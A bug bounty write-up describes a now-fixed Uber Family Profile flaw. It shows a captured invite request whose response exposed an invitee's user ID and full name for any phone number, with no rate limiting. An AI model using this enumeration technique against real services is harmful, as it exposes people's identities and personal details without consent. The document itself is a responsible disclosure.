Kevin Roh bio photo

Kevin Roh

Bug Bounty Participant

Email Twitter Github

A few months ago Uber came out with Family Profile which allows you to pay for another Uber riders fare.

Initially, when you try to intercept the information when you create the profile it won’t show much but once you intercept the information after you create the profile some interesting information shows up.

Request

PUT /rt/family/group/0725983c-4bf1-4513-99d7-bf5b983c6d8a/members HTTP/1.1
Host: cn-sjc1.uber.com
x-uber-device-language: en_US
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: client/iphone/2.136.2
x-uber-device-epoch: 1464724246914
x-uber-device-v-accuracy: 4.00000
x-uber-client-version: 2.136.2
x-uber-client-name: client
x-uber-cloudkit-id: _...
x-uber-device-h-accuracy: 5.00000
x-uber-device-location-latitude: xxxx
x-uber-device-os: 9.3.1
Content-Length: 85
x-uber-device-id-tracking-enabled: 1
x-uber-device-ids: aaid:...
Connection: close
X-Uber-RedirectCount: 0
Accept-Language: en-us
x-uber-token: ...
x-uber-device-location-altitude: xxxx
x-uber-device-model: iPhone7,2
x-uber-client-id: com.ubercab.UberClient
Content-Type: application/json
x-uber-device: iphone
x-uber-device-location-longitude: xxxx
X-Uber-DCURL: ...

{"newMemberInvitees":[{"familyName":"","givenName":"rohk","phoneNumber":"PHONE_NUMBER_HERE"}]}

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 May 2016 19:54:45 GMT
Content-Type: application/json
Connection: close
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0
x-uber-request-uuid: ...
X-Uber-App: rtapi
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 671

{"unsuccessfulInvites":[],"familyMembers":[{"isOrganizer":true,"familyName":"ROH","memberUUID":"46653c9f-ff63-4a4a-9f3f-0393610bc1cf","updatedAt":1464724067,"userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","groupUUID":"0725983c-4bf1-4513-99d7-bf5b983c6d8a","givenName":"KEVIN","lastInvitedAt":1464724065,"createdAt":1464724065,"confirmedAt":1464724065},{"isOrganizer":false,"familyName":"LAST_NAME","memberUUID":"de1d691b-f40a-4209-821d-f779977b2901","updatedAt":1464724485,"userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","groupUUID":"0725983c-4bf1-4513-99d7-bf5b983c6d8a","givenName":"FIRST_NAME","lastInvitedAt":1464724485,"createdAt":1464724485,"confirmedAt":null}]}

In the response the userUUID is shown along with the users first and last name. Now we have the users userUUID, first name, last name and phone number.

If the phone number is not associated with any account no information will be provided besides a text invite to that phone number.

Throughout testing, there was no rate limiting present at the time.

Resolved

  • Uber removed the userUUID from the response
  • Rate limiting was implemented allowing only 20 requests

Uber has resolved this issue and a bounty was given.